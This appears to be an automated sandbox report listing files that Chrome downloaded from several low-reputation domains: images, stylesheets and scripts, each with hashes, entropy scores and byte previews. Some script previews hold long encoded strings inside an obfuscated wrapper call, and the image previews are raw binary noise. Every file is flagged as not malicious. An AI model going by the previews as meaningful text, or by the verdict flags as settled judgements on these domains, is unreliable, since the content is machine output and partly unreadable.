                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgHZ8BdAGgG8EBpapALgDMBXNGAFwEt1N2yQAlBQC+ZAOaMACgGUmrDtzS9+ZNEIBEzJCAAESdgCdOHdQG4A8mABWIDgDoAJiEac0ISQZQQQB9gE9MEDJ1AH0QkCQAWRQHZgAbEHVKADcoOOYQegBCAAZhAVNUgx0oAF4ldQB6SoAxOHUBMhhyuyUoRs5yzHUAEQcADmAGsiQWpU5GlC71HJgIRmGAC2mAOQBNAA9zYYdpnuZKgCZhxlLMJEwBTBEySxsOTEW7AFsoCABxEHZ2HyQr7HUbgAwugXGIkuoYG92DBFlAAJJoRgodQkASNC5XG53WzsR4vN6RZjsKBcdB/a7adgrEAgpH0Bx2AAy+UoYi+ABVOM8IiTnhA5GwyUp2EIDF9mAY0Dp2KV2AAfeU5Uoq9gAflw9D40AM2kReMwbmAOh6pMEdlS6RA5kYl0qfFwOQEogcKCBcRQ2kFCh4QhQjmcUHi7DsAFUuHFWrTobCoJTFihgNlcPlRB6oA4ELIWELFJcKEUZaVXTBmDy0CGYOKzQBRBLlvHqJBVzgQdgNUwh/zeUrqH4bdiVKxQVLNoxtpIhpAGZpVSowfSk4yxNB2XCHABsUcH6cZz1cdisSDVsvUAGp2ItOEg7Oz2FyeYv+Zh8CAAKyNEPoXdyq839BMigGZkJgJZliAFZ2IsIAZoqYENreXx1iADZIAAQn4HJQGIKxQDy3TQRmDTYDkaJ2G83hoA4QJXnEDi8M6IwSgKOY+koQiFrKl7Xp2f52NWDh+HYl4QZgrHCvmricNSNZAjGcLXFCbaxvCDhanYSkwnCqn8PWEHsPQ6gAMRuAAtJpsZJM8MSZOoKFgCADhJMAnAOJehmOjkACkSSMCAjlgLAcA1mgUBgAkyZkOgABqPicIwfjehJQRqBQaAAGTpaulquWamUhsCoKcGIGlpHEgXwJlvBRnSYKlXE5VB
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):46363
                                                                                                                                                          Entropy (8bit):7.992069479137757
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:V7sGwp58JeLt5nEEzveqS6OP74JTJTc0sYUDDQvIuZsvqRx8ZUoYOr:V7siJ6tSunSPsfUDDQvIcqsOr
                                                                                                                                                          MD5:58B037BF9B5D946F526268642F7D084E
                                                                                                                                                          SHA1:8371F01F3C3D40EED3B6E20F5825AF6CFBB75018
                                                                                                                                                          SHA-256:88DDC5126678843CD4210026AA4B48E68837E200CDE8B8EBF362A4081C10B420
                                                                                                                                                          SHA-512:2727F9638526F26DC79DA57AC68F3DE6A2654DD81A2393CEB866910C7F63D065A25B5BEA0AE8CFBF6AEEBE02606BC96997845F2C7D7D03A09E2A0A259B77E7E1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sports/02.png
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:54E04FB893A611EC8275D01F62C539EE" xmpMM:InstanceID="xmp.iid:54E04FB793A611EC8275D01F62C539EE" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4B70E39BCDEB11E9AE98C341B6C88BB3" stRef:documentID="xmp.did:4B70E39CCDEB11E9AE98C341B6C88BB3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..A.....IDATx..}..]e.....2o.$..LzB......P.Q...TD.u..U.e.k......;...@.).gR..7.....{.$.. ...uy..7..w......+..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 108 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3918
                                                                                                                                                          Entropy (8bit):7.803490479933052
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:/YR2KR7+v9qVrjY1EgF1CD9eYUqZKBe7keFQoxASc:AsVqbmCHUqW6kQ9c
                                                                                                                                                          MD5:DDE8F95D4D0D6384CAB07D1D949AB721
                                                                                                                                                          SHA1:6427995625800D26026E77AFD653F559AA6ACD75
                                                                                                                                                          SHA-256:FC52F81976A363BE152257384CA65C7C810891DE38C69748F21EFABFFFBAB79C
                                                                                                                                                          SHA-512:4A7801460EF235259C6D6FB5E81B86311B8A97967468572F48E5EF9B438ADF7CB7F8B6CAF749DF3EF132E478147E40F863B470538C11F7E118155BA1DC442E21
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...l...%......1.i....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:FCBBF8AD009611ECBF3F80E83DC11D1C" xmpMM:DocumentID="xmp.did:FCBBF8AE009611ECBF3F80E83DC11D1C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FCBBF8AB009611ECBF3F80E83DC11D1C" stRef:documentID="xmp.did:FCBBF8AC009611ECBF3F80E83DC11D1C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..[K..I...U~..&X..a.{@....#.j...f.ZmV....-.)...{.!....U..s.Q....g.++322>.{.I..w.).?..\.....u...~.[?.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5240), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5240
                                                                                                                                                          Entropy (8bit):5.908883691605881
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VtYTmga+5+vCfFXily4XY5jlsQKi4OPM5A/J1llffuh0nbfZbIlhx1c9:Vt2mx+5+vCkIB5jlsQV9lleh0nNbuK9
                                                                                                                                                          MD5:2550867ECD6E45B82BF66302F09ED65D
                                                                                                                                                          SHA1:87C249625C01798DCBBB1C048426277DFAC5CA12
                                                                                                                                                          SHA-256:1E16F61A53CDA8D3B89972D82E7CF124282F0673B1D5AC54699F63F5AFA5C813
                                                                                                                                                          SHA-512:9B95DBC6CEDDFCAB82DF4E56B51B855A987F1EE0B2DE298D249429B4A810E8729A1A8C90C559C95B26462CE005AA3674978895B65A0039D22465DCFDB254F12C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/ConversionBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAZlwF0AaAbwDMUBPFALgoFc0YAXAS3U1ZKgEoyAXxIAPAJIBGADYNmbTmm68S7AQCJGSEAAIkrAE7s2agNwB5MACsQbAHQATEBXZoQABX0oIIfa2qYoEjUAfWCQJABZFHtGKRA1cgA3KClGEDoAQgAGQT4TZP1tEABedkw1ABF7XGA1PhI0UttFEHqkUvKsmAgKOpJ9DrUIgBYKADE+qSbFfXqYQYrGAHoAJj6UQYA5AE0RMz77YsxFPkwhEgtrNkwUWwBbKAgAcRBWVh8kU+w1diQAGRQAHMXAk1FIgS4xPZQWAUlAWPEgjB0IkPgoAMoACxQtSRKLR6ChoORaFR+iQCkuoNYmPY+nsbigvmof1+rFBDxcrCgLlZelBIBEMEx8MBIDGUiggNBvwAKvpqG5JdQ1EQ+PUTmdhJcbKwbvdHhFGNyOOhPmdflicXQYLZLCQtKwoTbbOwHa8AEJwhEukC5cggNDvfRPKB3dJMFimk5kGm/V1IK3ATAZCT1ONIWwQZWy2n0xnM0PhzB8YToMYoGCaWRRhQl85i1i5ukMpl+WGSn2R+RcVgCAraKDFDMmdgUTASYrD2mZwXC0XiyWAgA+y4zCfliuVfHX2ag1Gb+bb1CLIBLJhAUi0ZAH7GnvxIJUzjgoUFirFsAFUOFJbI3D/YULcH+YYgCQH5+N4GrFEIJhoNgEHUN4RDDiB4b5Ey2gDM+ThvlIH4RDyQZEX+ryEVyRFAWgeRjpgv5QK6LCpI4SDcDOBoUbybIkJsjB3GAPiYLM6q7jmeatoWoHnpe14DvM9G2M4aD2Gx8ZxkezJ8jw3bRtwAj6K8jD6Gg2gfuwhzFCAABkVkZGZSAAILGiguQmDAAD8qmZupEl+FCxS2uZ4HsT5mygQFzSgSoCZJimWRtA4uHvrYDkQOw6I+IkRggKRTbiQWfiflo+hep2MBnuuPkFdQUJ8LYNKB
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 126 x 126, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17760
                                                                                                                                                          Entropy (8bit):7.957866260044774
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:dNFQAtNhvlHVnA0WfG7JxTUKWonw9uDwxhQVwVeHWUk+mi:JtNhJtA0WfG7JiupDwgVwvUkQ
                                                                                                                                                          MD5:7DEE4D0E7475CFF3C67438CDB09BA48B
                                                                                                                                                          SHA1:9968C17CD158DA4B5184AD5ED00884E81A7F9D2F
                                                                                                                                                          SHA-256:EC58F6738A5F0A6489FFF74F5D2F3603D883D8CB4288F47998C7CA5FA80FDBF0
                                                                                                                                                          SHA-512:82C0CCD5F71E5B5BE02B2899C9523AE4618EF095B50A0144BDD691C6172E96CADBA367986E8812540EA7932E938E4A10296E2ECA14B77729F5B6642D6F324395
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sponsor/07.png
                                                                                                                                                          Preview:.PNG........IHDR...~...~......#......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C....DwIDATx..G.dG...s...H-*+..@I.].....-....][ri........x...+.K3.....C....63;==.....*.]U(..:.RF.z.9..../"Ee.....YXFF..........s...V."...H...g... .....p.h....4....|...4....>B@....5......`.........!..5......E`.........._F...L.c..%.0..U0............! W...............Y...;%.~W.O.)...>...@D.E8S......~...O.~....._.>.........K......#........[..H..;..~`.2...'...F... ^.....{...@...pw...A@l#.....q.!......v...).>B..D..D.n......x..F&|..D.I..z.."....@&......u....ku.)\.)\k..].....;...s..8B...}U., ......j.'.cD..E8...T.n....S.'...p]....AurN......^..a._%...4B..c`.....6?.i?~.H.....a5.......q.s....".u.._A..DD...}..[..W..:b............,........5D....*.......M...."h.k.!.h.`...N.w...L.g..$p.OP....p.8.L..b.;D.." .#.6.L...R........_7..%D.......D..#.N..!H.......E..K..~..I....G.....)b....>..f..(*"w .......w...._..6.*b.?N....#H.;.....C?.E..g....c>.....[m........~.f.....q~.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1508), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1508
                                                                                                                                                          Entropy (8bit):5.8012686077032365
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:V/IuRx4iKI/YOkStcE47QfKFAvgEf+qjijnrmhcRch2nRs:V/Rx4pI/zkSt0kS4glqjMnrmwchJ
                                                                                                                                                          MD5:71F1D2A1B8A7E16EA382FA2A18961662
                                                                                                                                                          SHA1:90A19705EE1B2854B4C2901A3103B0961966A0B9
                                                                                                                                                          SHA-256:F7205AEC396A6156872A52FF89822817285224424505F1A7A9251243CC91C827
                                                                                                                                                          SHA-512:E61F2B64E12262AC2135E863C20783216407440014DE8EBB2204E9F5CB75883E6A03D9620D18A9C15F6C1037698273A0D6D1E6EC0CF341CF112CD363B967D305
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/alertBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALAZnwF0AaAbwCIBGAJwFUBpCgLgDMBXNGAFwEt1MUEkhLcAlJXZIQAAiTcavHhQDcAeTAArEDwB0AExCteaEAAUaKCCBrcAnphEUA+s5BIAsin3sANiApyADcoX3YQZgBCAAYAXzEVEJoZEABebkwKABF9AA5gCjESNHTdNEwQIt50zIA5AE0ADzVCkhga7PYAegAmVpRUzHKxTDJYkg1tHkxeXQBbKAgPdm4oPnQkEbIYXxRpDyQAc2YYXQAJePJ9FHr3Nk4efmGybgALXiR5o7MoGig53RIV4oYCpSJUUTvT5zb6/f66GChXxgWBwABkaLeHy+hx+fwBiN8yNRmDEsUuw1G40mOgyswWEAA4iBuNwbJscBQYbi4XMKEQxEUyPo1lB7lx1s8aCz2DQ0GQPgAhXxQNBwKJUckkYBrGCvZiUbl4+FAkEsDgSp6CCRJOTpKEqKAY6TcAAqvDmIBQK0wFseAgkABJMgBiaCHEAeKBIOCFXQRjLRMQAfk+SpVarB0WYaaQytVcDBmpIPSoSa1nre3iQzEpYwmWlpM3mi2Wq0lHO2u32RxO50uwpudz9ktJLyhOONANNoPBkOxRt5CKRKPgGKx0Nh+OXRNXcFJ5KKMBQcwgKxA+lrpKpDamdJbTJZbJoHOwXK3/35gra0rWF/F/rPIeJA0KkZDSmghg0ABo42r8MhQPaHzCKkUC6IGMC/myACi/iemg3CiKhujONIvisCRMAAD5UUgKjStwspoDIGQUAoqpILwkqBGQawKDWZBoP8EQUKwUCGIEczeCJ3rcAAtCYFBatgaGLtuM7Jqx+i8EEPF8S+Bq8JeFChDY3CKigjRKeM2BaTpPHyGsSgAMIqkgNZctGsZtG5AlgBm6poemBbAWhzhBJkMitHZunkI5fAwK50YeaZthyQsik2TFDnti5vnMBQrwgOJNhKSQtmZEg0BoIEKkkRFF
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):316994
                                                                                                                                                          Entropy (8bit):5.349542251999496
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:fn1klIkhkKbGUXb+/X5K4qzyutwTw8PG4NYhvUQHoXO0H0BWVPMbj:fnuhhkZy+cYutwE8PG4GOQIF0BWVPU
                                                                                                                                                          MD5:27E34DE2F2296D64B3F5BF4FFCA0E4AA
                                                                                                                                                          SHA1:947C048AD208F8C9962470E6664B0D383A2D6694
                                                                                                                                                          SHA-256:41F75723A62FF6132D037855E2AA24A033224327EB266DB175E87F07020D2678
                                                                                                                                                          SHA-512:DC994D4040277FC76F6D21656E893211A5BAA0CBEC7B1D2295184E8A26401C49A99418F5FA44FDF040FF2E903FFD3470D9573C5FF07C65F4B2855D131EAC0875
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/public/vendor.dll.js
                                                                                                                                                          Preview:var vendor_library=function(t){function e(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,e),i.l=!0,i.exports}var n={};return e.m=t,e.c=n,e.d=function(t,n,r){e.o(t,n)||Object.defineProperty(t,n,{configurable:!1,enumerable:!0,get:r})},e.n=function(t){var n=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(n,"a",n),n},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="",e(e.s=9)}([function(t,e,n){"use strict";function r(t){return"[object Array]"===O.call(t)}function i(t){return"[object ArrayBuffer]"===O.call(t)}function o(t){return"undefined"!=typeof FormData&&t instanceof FormData}function a(t){return"undefined"!=typeof ArrayBuffer&&ArrayBuffer.isView?ArrayBuffer.isView(t):t&&t.buffer&&t.buffer instanceof ArrayBuffer}function u(t){return"string"==typeof t}function s(t){return"number"==typeof t}function c(t){return void 0===t}function l(t){return null!==t&&"object"==typeof t}function f
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):117368
                                                                                                                                                          Entropy (8bit):5.101561328282508
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:tDSGxw/0yB4S1L50e5I5B/H0qReXuRtNtFbdbJFG3++TaK5LufwZWlkRQmNa+:pw/fndI5B/H0qTRPHFBtfDlQ
                                                                                                                                                          MD5:7D27FCF135724229E2FCDD413095C488
                                                                                                                                                          SHA1:234C94F41310ED6A132BB4C15DAC9E2D033DC816
                                                                                                                                                          SHA-256:C32DAAFD8953A22D413C3881E15FA9D741A864FBF6C49CDFA57B46AAB383070B
                                                                                                                                                          SHA-512:B86BC73D166F7F9DBF82BD24ADFB71A8C4817BE93E7260E1ACFFBBC930D84E206517E044C2B31A0AC88C39960853D2837DA56097860F445F033757DAC3662CC6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/themes/default/bootstrap/bootstrap.min.css
                                                                                                                                                          Preview:html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{height:0;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{margin:0;font:inherit;color:inh
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1064), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1064
                                                                                                                                                          Entropy (8bit):5.801803490631308
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VdqXZgmNYcfxZxB1CrjugphvjuoNcdaICvK9RNfM65JxKCps9Y:VdqXwcpZxB1Crju8vjuCcDcKjNkCKH9Y
                                                                                                                                                          MD5:F28000871A2F33A26A1908919732D55E
                                                                                                                                                          SHA1:041AFADA4CBF9D6200E0D97CBF075175782E47F9
                                                                                                                                                          SHA-256:F46903D6333026E16D4EB027C2EB19C7930CDAA625B1F524C916F3CA6FDCEB42
                                                                                                                                                          SHA-512:1AB7D4AD1E9F84B5B3CDD35844DEAF2E965019316F2273F0462C33FF7E4A748CA773D00CEFF62B0AF9B600839488285BB2FE6DA9BEB897EDCFA8A0911D0AB25E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/367/views/home/indexList.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALAdnwF0AaAbwEkAzARwFEAuKgVzRgBcBLdTdkzgJRkAviQBeARgnMmrDtzS9+JJEIBEzJCAAESdgCdOHNQG4A8mABWIDgDoAJiCqc0IAAr6UEEPvYBPTE4SNQB9EJAkAFkUe2YAGxA1cgA3KDjmEAYAQgAGYQETVP1tNABeJEw1HJgIKjUBEhBSshgUAFsIdBA0diQGERJ7KHYoWTYuHiF9EHZmfTQydgAPdgAZTj0GNSTONoBzAFV9OIY0BycoePZbAGF0PSge2xh7NAAJFD0AajUAel2oHsQABaCAwf5oRxLX4AZgkACZfkk9lA2iB1pttsJRDBpsMQPYxvJJmQitp2KV2AALDb8UrAFz2FDAWwAZQA0hQAHImCpqCQAQUse3qlVsSK+nB+EKhtksSHqtmp3UwLHGCkCQmuyzWGwpnFsjJASwOcRI1xRaIx+sNkONb3y2JIUGa0zt+iJE0UQjJFOptM4lNsABJcSB8XQEmieiogyEtHEqLYQjAAD6pzgmaazea6Sr2TjJJJkB5cGA3OJQJB9NRGpbA+JqUTYPkFovkUtGCtVms6m5N83JuK8JUra0kNXExRBNBTGZzNB5tRt4ud8uV6tbMAoJZJGAbmvb3dfNDN1uF4v7nsMA1XsRiM/5i8kFtP9uv2v7YvDAx9Ev6GAGGuXZDmOSVDX2bEBCIBprhCZJKm0eoVEqKlcCSbA4IQuCKgNLh2ASARoNg5MELUJCGj5KkAFYMKwkd40CWwkGYMAABUiJgriSPgxDkPPdsSxGMtu03NRLRAO4em6dgBw/RtBxCYcDTiPUJzkL1NTIbMFyXVTV2ErsDy2VS9D3Yzb0re9H2XC8eLIiiUM/EVyB/fQ/yQACgIg0C4nAkCoMUhz+MqCA6NIhjcNsNBURATjiPyYiYMS5KVEMmAACVukcfQADE0D6bAiGEQooGKGBykqAA1A5fgADlFE
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):471351
                                                                                                                                                          Entropy (8bit):5.354145765260824
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:RUUEuK5a8lZkPIQUT63i6PSNh4TACEzcC:RpPIQUT63i6PSNhoACTC
                                                                                                                                                          MD5:A7DBACA9FBCAADD33CF7226BF0094EE8
                                                                                                                                                          SHA1:B431C0C5749915FA32D17377C6DDA4A4424E01BD
                                                                                                                                                          SHA-256:E031CA4B92D2A47F7F2F9C2121C31855B6E88A35CF6726DD69EAF533FA842E86
                                                                                                                                                          SHA-512:52F8A436BB2176F43D6554300EDFCADEF072F8EC3BC9828990125281119F8DE683FDC371A03AD2945057D42C92CB8764B8FDC9EE65AB0759B871DED4CB8FE172
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Preview:.tutorial-body[data-v-e9757988]{min-width:1000px;background:#201b15 url(/pc/image-pc/tutorial/big-bg.jpg) no-repeat bottom;background-size:cover}.tutorial-body [data-v-e9757988],.tutorial-body [data-v-e9757988]:after,.tutorial-body [data-v-e9757988]:before{box-sizing:content-box}.tutorial-body .add-members[data-v-e9757988],.tutorial-body .home[data-v-e9757988]{position:absolute;right:13px;top:50%;transform:translateY(-50%)}.tutorial-body .add-members.home[data-v-e9757988],.tutorial-body .home.home[data-v-e9757988]{right:17px}.tutorial-top[data-v-e9757988]{background:url(/pc/image-pc/tutorial/tutorial-bg.jpg) repeat-x 0 0;height:100px;width:100%;padding:15px 0;border-bottom:3px solid #007989}.tutorial-title[data-v-e9757988]{height:1px;background:#4d4d4d;width:342px;margin:30px auto 0;text-align:center}.tutorial-title h1[data-v-e9757988]{color:#faf4e0;font-size:24px;position:relative;top:-15px;background:#272727;width:154px;margin:0 auto;font-weight:900}.tutorial-main[data-v-e9757988]{wi
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 28 x 25, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1591
                                                                                                                                                          Entropy (8bit):7.158858778547658
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:uv1hfvWwjx82lY2T3JVrG76hyJ3VrZTTGWtvUo3JW8NeAjMg+GA6nDr0R/AEJdnb:u9ANn2N8J3bR9ReAb+LUDrSAGqU
                                                                                                                                                          MD5:279C9093E7A9BC8E2159000014400234
                                                                                                                                                          SHA1:D9D353B9B25F709E48DAD2265806B4F022D6602F
                                                                                                                                                          SHA-256:9FED9AE7A0C5F3F890A8BD19E23721345C48B14C43B7D7BD453A3CB40344BA3E
                                                                                                                                                          SHA-512:0D45D5876C255FA3B717D28880CBDC77F43797FBC6B7B8D001B96FE409445E6A5A1E16E19E9F3F3E8B4E75FC0B46955452A39CE4D60BA4A34A289D18E35BD1C8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/menu/nv1.png
                                                                                                                                                          Preview:.PNG........IHDR.............".N'....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:84D932BE504B11E78BFE9E8B143BFF96" xmpMM:DocumentID="xmp.did:84D932BF504B11E78BFE9E8B143BFF96"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:84D932BC504B11E78BFE9E8B143BFF96" stRef:documentID="xmp.did:84D932BD504B11E78BFE9E8B143BFF96"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..Mh.A..7...b.x..!.....b#~ ..-.`.E..xV."^D.....?...(..*..*Z..(........h.....0.n.3.....y.y/of6...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/cc.png?r=4421600803
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1020 x 70
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):46296
                                                                                                                                                          Entropy (8bit):7.90992422001696
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:nJydCwuBhwTijhSuE4BOo3diVigzWC3W6flfeLr5qTK4LiW+fn7MO5d9QjdpR:JB9BhTzJddg13flWrUK42Pf7MO5d9Ql
                                                                                                                                                          MD5:6599D33C37F7CF6E6C8FF5FC23E64C31
                                                                                                                                                          SHA1:E8D01C518F33DE4948081FB34D6905331286C3B6
                                                                                                                                                          SHA-256:034455F2E109B44E3BDC554D8101E168F3CCAC1B9CBCD100A1E5E5285241921D
                                                                                                                                                          SHA-512:EA25D5202231A1CD4801E146B6479DD95CA9FFE4B0545709F45DC5970881078F38200BED9877C9AA286E8E7CD63F4F3CC2B817BE4B7B8898BC7CF05E3DD0AB76
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
